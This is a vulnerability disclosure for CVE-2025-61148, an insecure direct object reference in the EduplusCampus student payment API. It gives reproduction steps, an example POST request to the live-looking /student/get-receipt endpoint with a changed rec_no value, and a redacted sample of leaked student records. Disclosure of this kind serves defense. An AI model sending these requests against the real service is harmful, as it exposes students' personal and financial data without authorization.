# CVE-2025-61148
The vulnerability exists in the Student Payment API. The application fails to properly validate whether the user requesting a receipt is authorized to view it. By modifying the rec_no parameter in the API request, an attacker can access the receipts of other users.

# CVE-2025-61148: IDOR in EduplusCampus Student Payment API

**CVE ID:** CVE-2025-61148
**Vulnerability Type:** Insecure Direct Object Reference (IDOR)
**Affected Product:** EduplusCampus
**Affected Endpoint:** `/student/get-receipt`
**Researcher:** Vinay Sharma

## Summary
A critical Insecure Direct Object Reference (IDOR) vulnerability was identified in the EduplusCampus student portal (version 3.0.1). This vulnerability allows an authenticated user to access the sensitive personal and financial records of other students by modifying the `rec_no` parameter in the API request.

## Impact
Successful exploitation allows an attacker to retrieve:
* Full Name and Roll Number
* Payment Amount and Dates
* Transaction IDs (TID) and Bank Details
* Personal Identifiable Information (PII)

## Vulnerability Details
The application fails to properly validate the authorization of the user requesting a payment receipt. The `rec_no` parameter is sequential or guessable, and the server returns the receipt details for the requested number without checking if it belongs to the currently logged-in user.

### Steps to Reproduce
1.  Login to the student portal.
2.  Navigate to the receipt generation section.
3.  Intercept the POST request to `/student/get-receipt`.
4.  Locate the `rec_no` parameter in the JSON body.
5.  Modify the `rec_no` value to another valid receipt number (e.g., changing `PCUF-232025` to `PCUF-231824`).
6.  Send the request.
7.  The server responds with the personal and financial details of the student associated with that receipt number.

<img width="716" height="446" alt="image" src="https://github.com/user-attachments/assets/a6735745-e9e7-40ec-8218-583cc152793d" />
<img width="720" height="485" alt="image" src="https://github.com/user-attachments/assets/7ee25304-dbb6-4463-a2a2-058cfef0e945" />

### Example Request
```http
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>

{
    "rec_no": "PCUF-233012"
}

### Leaked DATA Example:
{
    "fullname": "REDACTED_NAME",
    "rollno": "CSE2019XXX",
    "component_total_amount": 55000.0,
    "trans_list": [
        {
            "date": "21-Oct-2024",
            "mode": "Online",
            "amount": 55000.0,
            "tid": "42951XXXX"
        }
    ]
}
```
### Vendor Information
* **Vendor:** EduplusCampus 
* **Product:** EduplusCampus Student Portal / Student Payment API

### Affected Versions
* **Version:** EduplusCampus 3.0.1

### Discoverer
* **Vinay Sharma** - Security Researcher